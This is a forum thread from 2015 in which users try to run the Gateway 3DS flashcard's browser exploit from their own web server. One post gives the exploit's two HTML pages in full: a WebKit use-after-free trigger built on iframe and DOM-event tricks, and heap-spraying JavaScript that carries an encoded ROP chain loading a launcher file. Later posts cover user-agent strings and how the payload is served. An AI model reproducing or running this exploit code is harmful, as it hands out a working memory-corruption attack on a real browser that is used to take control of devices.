WIP: Getting Gateway website exploit running on local webserver

Discussion in '3DS - Flashcards & Custom Firmwares' started by Neptune, Jan 10, 2015.

  1. Neptune
    OP

    Neptune GBAtemp Advanced Maniac

    Member
    1,588
    531
    Dec 7, 2003
    United States
    Internet
    The magic numbers are based on the User-Agent that is sent over to the go.gateway-3ds.com website. I have copied my UA from my 3ds xl and dumped the html source from the gateway site to one of my own and it says "Failed to load web page" and after a few seconds dumps you back to the main menu with an error like what other people are getting when attempting to run the exploit which require them to clear cookies or some such. That's definitely not the cause in this case. If anyone has any ideas on what to do please share. I don't like the idea of having to rely on their web server. It's gone down too many times recently :P
     
    Margen67 likes this.
  2. Seanshoots

    Seanshoots Member

    Newcomer
    23
    26
    Jan 30, 2013
    Canada
    HTML:
    <html>
    <head>
    <style>
        body {
            color:white;
            background:black;
        }
       
       
    </style>
    <script>
        function magicfun(mem, size, v) {
            var a = new Array(size - 20);
            nv = v + unescape("%ucccc");
            for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
            var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
     
            mem.push(t);
        }
     
        function dsm(evnt) {
            var mem = [];
     
            for (var j = 20; j < 430; j++) {
                magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
            }
        }
    </script>
    </head>
    <body>
            <h1 align="center">GATEWAY 3DS LOADING...</h1>
            <iframe width=0 height=0 src="frame.html"></iframe>
    </body>
    </html>
    
    frame.html source
    HTML:
    <html>
        <head>
            <script>
                var nb = 0;
                function handleBeforeLoad() {
                    if (++nb == 1) {
                        p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                    } else if (nb == 2) {
                        p.removeChild(f);
                    }
                }
               
                function documentLoaded() {
                    f = window.frameElement;
                    p = f.parentNode;
                    var o = document.createElement("object");
                    o.addEventListener('beforeload', handleBeforeLoad, false);
                    document.body.appendChild(o);
                }
     
                window.onload = documentLoaded;
            </script>
        </head>
        <body>
            KEKEKEKEK...
        </body>
    </html>
    
     
    Margen67 likes this.
  3. arielp

    arielp Advanced Member

    Newcomer
    99
    6
    Apr 29, 2008
    Indonesia
    Indonesia
    they're using index.php, actual is http://go.gateway-3ds.com/index.php

    unfortunately php-source is cannot be seen from user side,.

    if they're running some php-code within...you cannot replicate it.

    unless you can reverse enginering (which is not possible by only looking at above html code), or you can get the index.php source from gateway team (unlike)


    .. most probably they're running something, otherwise they can just use index.html or index.htm
     
    Margen67 likes this.
  4. arielp

    arielp Advanced Member

    Newcomer
    99
    6
    Apr 29, 2008
    Indonesia
    Indonesia
    that html code above, is already processed by php (web server) only to show html content / java, php code itself is cannot be seen, unless you find exploit in their server/hack then grab than index.php (and all related items) .

    that's how php work

    sample php code

    <?php
    sample = "hello world";
    echo $sample;
    ?>

    what you see from user browser then "view source" only

    helloworld
     
  5. gamesquest1

    gamesquest1 Nabnut

    Member
    14,091
    9,426
    Sep 23, 2013
    i wonder if "KEKEKEKEK..." is some trolling :P
     
  6. s-arash

    s-arash GBAtemp Regular

    Member
    160
    82
    Sep 3, 2013
    United States
    you cant exploit browser with php cause its server side

    so all of the things that gateway webpage does is about javascript codes which is client side and you can view it
     
  7. Thomas12345

    Thomas12345 GBAtemp Advanced Fan

    Member
    551
    409
    Dec 1, 2014
    Canada
    Well I managed to get the exploit up without connecting to gateway website...

    Basically i set up a proxy server on my linux box, and on my 3ds connected to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages

    turns out the index.html I dumped with this method is different from what I got when I just changed my PC's web browser's user agent to 3ds user agent
     
    Margen67 likes this.
  8. orochi115

    orochi115 GBAtemp Regular

    Member
    149
    50
    Jun 8, 2013
    Switzerland
    Many ways:
    - Packet sniffering
    - Custom UA string sent from curl
     
    Margen67 likes this.
  9. Seanshoots

    Seanshoots Member

    Newcomer
    23
    26
    Jan 30, 2013
    Canada

    I used Fiddler and set it up as a proxy on my 3DS. It's weird because the page I posted worked when I dumped it, but when I use Fiddler's autoresponder (loads pages locally instead of sending requests) or host them on my own server I only get an error. Don't know what's wrong, but I don't have a gateway card to do anything right now anyways.
     
  10. Duo8

    Duo8 I don't like video games

    Member
    3,438
    1,138
    Jul 16, 2013
    What do you think the php code is for? If it's just for detecting and distributing the payload then it shouldn't matter.
     
  11. Vappy

    Vappy GBAtemp Advanced Maniac

    Member
    1,507
    1,154
    May 23, 2012
    Thomas12345 said he got it working, could try replicating his method. Of course that only gives you the static html for your 3DS configuration, and not the PHP script generating them, but that one set of pages would probably work for all other consoles of the same model and version. If someone made an archive of all combinations, it'd be a fine alternative to Gateway's own site.
     
    bendrr likes this.
  12. Duo8

    Duo8 I don't like video games

    Member
    3,438
    1,138
    Jul 16, 2013
    Maybe the php code is just for returning the correct site among pre made ones.
     
  13. Arkansaw

    Arkansaw GBAtemp Advanced Fan

    Member
    993
    194
    Jul 23, 2005
    Trinidad and Tobago
    can someone put up the UA string and the payload section that differs? If enough people verify it is just a matter of time
     
  14. hias

    hias Member

    Newcomer
    27
    9
    Jun 16, 2014
    Argentina
    The payload differs according to the user agent you are using. You need the correct user agent according to your 3ds firmware version. You can find information about the user agent strings on 3dsbrew:

    http://3dbrew.org/wiki/Internet_Browser

    The easiest way to get the correct agent for your 3ds is to setup a site on your local webserver which display the user agent of the accessing web browser, then visit it with your 3ds. If it does not work if you use a proxy the proxy uses a wrong user agent.

    Just use the user agent switcher addon for firefox and you are good to go.
    Gateway uses PHP do supply the correct payload according to the user agent, no exploit is going on here server side.

    You can also use sites like this

    http://www.whatsmyua.com
     
    Margen67 likes this.
  15. Duo8

    Duo8 I don't like video games

    Member
    3,438
    1,138
    Jul 16, 2013
    Or just follow this:
    Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US

    <lang> is "en", "fr", etc. <region> is "US", "EU", etc. See below for <version>

    Version is in browser settings.
     
    Margen67 likes this.
  16. Neptune
    OP

    Neptune GBAtemp Advanced Maniac

    Member
    1,588
    531
    Dec 7, 2003
    United States
    Internet
    It's not generated using ONLY the UA. There is something else that is sent over.